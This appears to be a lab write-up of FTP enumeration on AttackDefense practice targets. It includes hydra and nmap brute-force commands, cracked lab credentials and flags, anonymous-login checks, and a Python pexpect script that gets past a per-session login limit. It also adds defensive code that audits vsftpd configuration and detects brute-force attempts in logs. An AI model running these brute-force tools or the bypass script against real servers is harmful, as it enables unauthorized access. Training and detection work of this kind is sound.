# ftp-enum

Lab collection showing FTP enumeration and credential discovery techniques.

***

{% stepper %}
{% step %}

#### Lab 1 — FTP Brute Force and Extract Flags

Target IPs and context are shown in the commands below.

* Use hydra with user/password wordlists to check for valid credentials on the FTP server.

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp
```

Example hydra output:

```
[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.217.238.3:21/
[21][ftp] host: 192.217.238.3   login: sysadmin   password: 654321
[21][ftp] host: 192.217.238.3   login: rooty   password: qwerty
[21][ftp] host: 192.217.238.3   login: demo   password: butterfly
[21][ftp] host: 192.217.238.3   login: auditor   password: chocolate
[21][ftp] host: 192.217.238.3   login: anon   password: purple
[21][ftp] host: 192.217.238.3   login: administrator   password: tweety
[21][ftp] host: 192.217.238.3   login: diag   password: tigger
1 of 1 target successfully completed, 7 valid passwords found
```

Found credentials:

* sysadmin:654321
* rooty:qwerty
* demo:butterfly
* auditor:chocolate
* anon:purple
* administrator:tweety
* diag:tigger

* Use the nmap `ftp-brute` script to confirm `sysadmin`'s password:

```bash
echo "sysadmin" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.3
```

Example nmap output:

```
21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     sysadmin:654321 - Valid credentials
|_  Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8
```

* Extract the flags by logging into the FTP server with each found user and downloading the flag files:

Example FTP session:

```bash
ftp 192.217.238.3

ftp> ls
ftp> get secret.txt
ftp> exit

root@attackdefense:~# cat secret.txt
```

Reveal flags (from the server, per account):

* sysadmin flag: `260ca9dd8a4577fc00b7bd5810298076`
* rooty flag: `e529a9cea4a728eb9c5828b13b22844c`
* demo flag: `d6a6bc0db10694a2d90e3a69648f3a03`
* auditor flag: `098f6bcd4621d373cade4e832627b4f6`
* anon flag: `1bc29b36f623ba82aaf6724fd3b16718`
* administrator flag: `21232f297a57a5a743894a0e4a801fc3`
* diag flag: `12a032ce9179c32a6c7ab397b9d871fa`

{% endstep %}

{% step %}

#### Lab 2 — VSFTPD Recon: Basics

* Challenge reference: VSFTPD Recon: Basics (AttackDefense)
* Target IP: `192.119.169.3`

Network info (example):

```
ip -br -c a
	eth1@if170803   UP  192.119.169.2/24
```

Initial discovery:

```bash
nmap 192.119.169.3
# 21/tcp open  ftp
```

Service/version detection:

```bash
nmap -p21 -sV -O 192.119.169.3
```

Example output:

```
21/tcp open  ftp     vsftpd 3.0.3
```

* FTP server version: vsftpd 3.0.3
* Check for anonymous login using nmap ftp-anon script:

```bash
nmap --script ftp-anon -p21 192.119.169.3
```

Example output:

```
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Dec 18  2018 flag
|_drwxr-xr-x    2 ftp      ftp          4096 Dec 18  2018 pub
```

* Anonymous FTP login is allowed. Connect with the anonymous account and download the flag:

```bash
ftp 192.119.169.3

# Use anonymous:anonymous to login

Name (192.119.169.3:root): anonymous
    331 Please specify the password.
Password:
    230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag
```

Reveal flag: `4267bdfbff77d7c2635e4572519a8b9c`
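
A defender-side check for the finding above, as an added example that is not part of the original lab: it audits `vsftpd.conf` text for the anonymous-access settings that `ftp-anon` detects from the outside. The sample configurations are constructed, and the defaults are the ones documented in vsftpd.conf(5); a file that never mentions `anonymous_enable` still allows anonymous login.

```python
# Added example (not from the lab): audit vsftpd.conf text for anonymous access.
# DEFAULTS are the defaults documented in vsftpd.conf(5).
DEFAULTS = {
    "anonymous_enable": "YES",         # anonymous login is ON unless disabled
    "write_enable": "NO",              # required for any FTP write command
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
}
TRUTHY = {"YES", "TRUE", "1"}          # boolean spellings treated as enabled

def effective_settings(conf_text):
    """Overlay the file's option=value lines on the documented defaults."""
    settings = dict(DEFAULTS)
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().upper()
    return settings

def audit(conf_text):
    """Return (option, message) findings for anonymous-access exposure."""
    s = effective_settings(conf_text)
    on = lambda opt: s[opt] in TRUTHY
    findings = []
    if on("anonymous_enable"):
        findings.append(("anonymous_enable",
                         "anonymous login allowed; set anonymous_enable=NO"))
        if on("write_enable") and (on("anon_upload_enable")
                                   or on("anon_mkdir_write_enable")):
            findings.append(("write_enable",
                             "anonymous users can write to the server"))
    return findings

# Constructed samples: the first never mentions anonymous_enable at all.
IMPLICIT_ANON = "listen=YES\nlocal_enable=YES\n"
WRITABLE_ANON = "anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\n"
HARDENED = "listen=YES\nanonymous_enable=NO\nlocal_enable=YES\n"

if __name__ == "__main__":
    for name, conf in [("implicit", IMPLICIT_ANON), ("writable", WRITABLE_ANON),
                       ("hardened", HARDENED)]:
        print(name, audit(conf))
```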
{% endstep %}

{% step %}

#### Lab 3 — VSFTPD Recon: Dictionary Attack

* Challenge reference: VSFTPD Recon: Dictionary Attack (AttackDefense)
* Target IP: `192.14.30.3`
* Note: The FTP server terminates the session after 3 attempts, so a custom approach may be required.

Network info (example):

```
ip -br -c a
	eth1@if170888   UP   192.14.30.2/24
```

Discovery:

```bash
nmap 192.14.30.3
# 21/tcp open  ftp
```

Service/version detection:

```bash
nmap -p21 -sV -O 192.14.30.3
# 21/tcp open  ftp     vsftpd 3.0.3
```

* Example using nmap ftp-brute with a single user (`billy`):

```bash
echo "billy" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.3
```

Example output:

```
21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     billy:carlos - Valid credentials
|_  Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5
```

* Discovered credential: billy:carlos
* If the server terminates sessions after 3 attempts, use a custom script that spawns a fresh FTP connection per attempt. Example Python script using pexpect (save as `billy.py`):

```python
from __future__ import print_function  # print() behaves the same on Python 2 and 3

import sys

import pexpect

# Usage: python billy.py <target> <username> <password_dict>
target = sys.argv[1]
username = sys.argv[2]
password_dict = sys.argv[3]

# Load the password dictionary and strip trailing newlines
with open(password_dict) as f:
    lines = [line.rstrip('\n') for line in f]

# Iterate over the dictionary, spawning a fresh FTP session per attempt
for password in lines:
    child = pexpect.spawn('ftp ' + target)
    child.expect('Name .*: ')
    child.sendline(username)
    print("Trying with password: ", password)
    child.expect('Password:')
    child.sendline(password)
    i = child.expect(['Login successful', 'Login failed'])
    if i == 1:
        # Login failed: close this session before the next attempt
        child.close(force=True)
    elif i == 0:
        print("Login Successful for ", password)
        print(child.before)
        break
```

Run the script:

```bash
python billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
```

Example output:

```
Login Successful for  carlos
```

* Use the credential to fetch the flag via FTP:

```bash
ftp 192.14.30.3

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag
```

Reveal flag: `c07c7a9be16f43bb473ed7b604295c0b`
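
The hydra run in Lab 1 and the one-connection-per-attempt script above both defeat a per-session limit, so detection has to count failures per client across sessions. The following added example (not part of the original labs) does that over vsftpd-style login log lines and reports a success that follows a burst of failures. The log lines, the `alice` user, the `192.14.30.50` client, and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Login lines as written to vsftpd.log; CONNECT lines carry no [user] and are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)

def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (brute_force_clients, compromised), where compromised holds
    (client, user, prior_failures) for logins that succeed after an alert."""
    recent = defaultdict(deque)   # client -> failure timestamps inside the window
    fails = defaultdict(int)      # (client, user) -> total failures seen
    alerted, compromised = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        client, user = m.group("client"), m.group("user")
        if m.group("result") == "FAIL":
            q = recent[client]
            q.append(ts)
            while ts - q[0] > window:      # drop failures older than the window
                q.popleft()
            fails[(client, user)] += 1
            if len(q) >= threshold and client not in alerted:
                alerted.append(client)
        elif client in alerted:            # OK LOGIN from a client already flagged
            compromised.append((client, user, fails[(client, user)]))
    return alerted, compromised

# Constructed sample log (not captured from the lab).
SAMPLE_LOG = """\
Tue Dec 18 10:15:00 2018 [pid 3001] CONNECT: Client "192.14.30.2"
Tue Dec 18 10:15:01 2018 [pid 3000] [billy] FAIL LOGIN: Client "192.14.30.2"
Tue Dec 18 10:15:03 2018 [pid 3004] [billy] FAIL LOGIN: Client "192.14.30.2"
Tue Dec 18 10:15:04 2018 [pid 3010] [alice] FAIL LOGIN: Client "192.14.30.50"
Tue Dec 18 10:15:05 2018 [pid 3007] [billy] FAIL LOGIN: Client "192.14.30.2"
Tue Dec 18 10:15:07 2018 [pid 3013] [billy] FAIL LOGIN: Client "192.14.30.2"
Tue Dec 18 10:15:09 2018 [pid 3016] [billy] FAIL LOGIN: Client "192.14.30.2"
Tue Dec 18 10:15:10 2018 [pid 3019] [alice] OK LOGIN: Client "192.14.30.50"
Tue Dec 18 10:15:11 2018 [pid 3022] [billy] OK LOGIN: Client "192.14.30.2"
""".splitlines()

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

A single mistyped password followed by a success (`alice` in the sample) is not reported; only a success from a client that already crossed the failure threshold is.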
{% endstep %}
{% endstepper %}
